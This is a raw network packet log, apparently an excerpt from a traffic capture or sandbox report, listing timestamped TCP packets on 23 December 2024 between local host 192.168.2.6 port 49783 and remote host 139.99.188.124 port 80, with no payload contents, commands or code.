                                                                                                        Dec 23, 2024 08:39:41.548141003 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.548187971 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.548226118 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.549037933 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.549088955 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.549196959 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.549957991 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.550034046 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.550054073 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.550844908 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.550889015 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.550997019 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.551883936 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.551950932 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.551973104 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.552701950 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.552802086 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.552830935 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.553596973 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.553642988 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.553968906 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.554511070 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.554542065 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.554562092 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.555429935 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.555517912 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.555536032 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.556358099 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.556405067 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.556503057 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.557401896 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.557445049 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.557454109 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.558196068 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.558238983 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.558309078 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.559122086 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.559246063 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.559281111 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.560024023 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.560061932 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.560094118 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.560945988 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.561163902 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.561220884 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.561853886 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.561897993 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.561969995 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.562772036 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.562819958 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.562819958 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.563704014 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.563796997 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.563812017 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.564589024 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.564613104 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.564683914 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.564735889 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.565502882 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.565546989 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.565623999 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.566414118 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.566461086 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.566463947 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.567373037 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.567435026 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.567456007 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.568262100 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.568315029 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.568372011 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.569190025 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.569258928 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.569317102 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.570080996 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.570164919 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.570194006 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.570988894 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.571046114 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.571103096 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.571938992 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.572051048 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.572061062 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.572869062 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.572942019 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.572943926 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.573741913 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.573786020 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.573849916 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.574233055 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.574655056 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.574697971 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.574774027 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.575577974 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.575615883 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.575660944 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.576482058 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.576551914 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.576574087 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.577430010 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.577477932 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.577528954 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.578320026 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.578393936 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.713848114 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.713871956 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.713968992 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.714006901 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.714101076 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.714257956 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.714891911 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.714958906 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.715817928 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.715851068 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.715924025 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.716078043 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.716720104 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.716902018 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.717041969 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.717626095 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.717803001 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.717947006 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.718589067 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.718648911 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.718812943 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.719476938 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.719579935 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.720088959 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.720405102 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.720503092 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.720643044 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.721304893 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.721369982 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.721546888 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.722207069 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.722282887 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.722398043 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.723125935 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.723237038 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.724087000 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.724145889 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.724174023 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.724234104 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.724931002 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.727993965 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.735083103 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.735136032 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.735141993 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.735579967 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.735671043 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.735686064 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.736481905 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.736579895 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.736603022 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.737401009 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.737461090 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.737559080 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.738284111 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.738332033 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.738337040 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.739274025 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.739341974 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.739408016 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.740158081 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.740225077 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.740650892 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.741017103 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.741128922 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.741146088 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.741934061 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.741986990 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.742033958 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.742862940 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.742919922 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.742969036 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.743799925 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.743846893 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.743854046 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.744873047 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.744924068 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.744947910 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.745702982 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.745722055 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.745754004 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.746552944 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.746699095 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.746725082 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.747478962 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.747528076 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.747555971 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.748374939 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.748481989 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.748486996 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.749267101 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.749321938 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.749371052 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.750298023 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.750354052 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.750442028 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.751115084 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.751180887 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.751208067 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.752192974 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.752228022 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.752285957 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.752942085 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.753040075 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.753062963 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.753843069 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.753896952 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.753969908 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.754776001 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.754884005 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.754899025 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.755700111 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.755786896 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.755808115 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.756582975 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.756714106 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.756743908 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.757530928 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.757586002 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.757616043 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.758438110 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.758508921 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.758569956 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.759366035 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.759459019 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.759490967 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.760273933 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.760406971 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.760418892 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.761177063 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.761303902 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.761492014 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.762126923 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.762238979 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.762440920 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.763015032 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.763112068 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.763202906 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.763940096 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.764081955 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.764286995 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.764949083 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.764961958 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.765109062 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.765855074 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.765918970 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.766040087 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.766675949 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.766731977 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.766787052 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.767652988 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.767793894 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.768027067 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.768505096 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.768620968 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.768650055 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.769440889 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.769505024 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.769535065 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.770438910 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.770473957 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.770503044 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.795420885 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.847352982 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.905734062 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.905909061 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.906126022 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.906207085 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.906295061 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.906379938 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.907156944 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.907164097 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.907445908 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.908178091 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.908186913 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.908298969 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.908895969 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.909002066 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.909085989 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.909926891 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.909934998 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.910065889 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.910713911 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.910842896 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.910948992 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.911711931 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.911879063 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.912374020 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.912609100 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.912705898 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.913446903 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.913516045 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.913662910 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.913764000 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.914426088 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.914489985 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.915112972 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.915317059 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.915411949 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.915719032 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.916268110 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.916347980 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.917170048 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.917218924 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.927371979 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.927529097 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.927565098 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.927572966 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.927594900 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.927845955 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.928476095 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.928637028 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.928886890 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.929438114 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.929549932 CET8049783139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.929585934 CET4978380192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:41.930332899 CET8049783139.99.188.124192.168.2.6
